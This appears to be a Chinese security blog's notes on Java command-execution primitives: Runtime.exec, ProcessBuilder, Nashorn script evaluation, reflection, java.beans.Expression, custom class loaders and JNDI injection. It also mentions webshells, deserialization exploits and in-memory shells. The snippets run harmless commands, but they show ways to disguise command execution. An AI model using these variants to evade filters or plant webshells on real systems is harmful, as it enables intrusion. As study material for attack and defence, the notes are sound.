目录
0x01 exec或者ProcessBuilder
java.lang.Runtime.getRuntime ().exec(new String[]{"open","./"});
以及
new ProcessBuilder(new String[]{"open","./"} ).start ();
两者关系,在ProcessBuilder类start下断点,发现exec最终也会执行到此处
0x02 使用ScriptEngineManager引擎
String s1 = "s=[3];s[0]='/bin/bash';s[1]='-c';s[2]='";
String s2 = "ls";
String s3 = "';java.lang.Runtime.getRuntime().exec(s);";
Process process = (Process) new ScriptEngineManager ().getEngineByName("nashorn").eval(s1 + s2 + s3);
InputStream inputStream = process.getInputStream();
StringBuilder stringBuilder = new StringBuilder();
BufferedReader bufferedReader = new BufferedReader(new InputStreamReader (inputStream));
String line;
while((line = bufferedReader.readLine()) != null) {
stringBuilder.append(line).append("\n");
}
System.out.println (stringBuilder.toString ());
0x03 反射
String command = (args.length != 0) ? args[0] : "/bin/sh,-c,open ./";
String[] execArgs = command.split(",");
Class rt = Class.forName("java.lang.Runtime");
或者 Class rt = ClassLoader.getSystemClassLoader().loadClass("java.lang.Runtime");
Method gr = rt.getMethod("getRuntime");
Method ex = rt.getMethod("exec", String.class);
ex.invoke(gr.invoke(null, new Object[]{}), execArgs);
0x04 自定类加载器
自定义类加载器加载类转换后的字节数组或者其它方式编码的类,tomcat中有bcel类加载器相关实现。冰蝎也是靠客户端传递信息给冰蝎木马服务端,然后服务端进行类的加载,不一样的是web的类加载不完全遵循双亲委派,当修改jsp文件后不需要重启就可以刷新最新的运行结果(即热加载机制),加载最新的的类,卸载旧的类,具体为WebappClassLoader实现相关功能。
0x05 其他包装方式:
如java.beans.Expression,本质也是调用processBuilder.start
String[] strings={"open","./"};
ProcessBuilder processBuilder =new ProcessBuilder(strings);
String var1 ="start";
Object[] var2 =new Object[]{};
Expression var3=new Expression(processBuilder,var1,var2);
var3.getValue ();
0x06 JNDI注入,远程加载jar
包括rmi,ladp等等
以上几种方式并非独立的,或多或少都有联系,如反序列化漏洞有的也会用到JNDI注入,最终也是用类加载器加载执行,在漏洞利用中比较灵活,各种方式也会有限制,ys中自定义要执行的代码也比较灵活,后续衍生出自定义类加载器加载data中的字节码或者反射获取req/res进行回显,以及通过反射获取tomcat中的容器组件写入内存马等
后续继续补充修改……
参考:
https://xz.aliyun.com/t/7798#toc-1
https://cloud.tencent.com/developer/article/1180753
https://blog.knownsec.com/2015/12/untrusted-deserialization-exploit-with-java/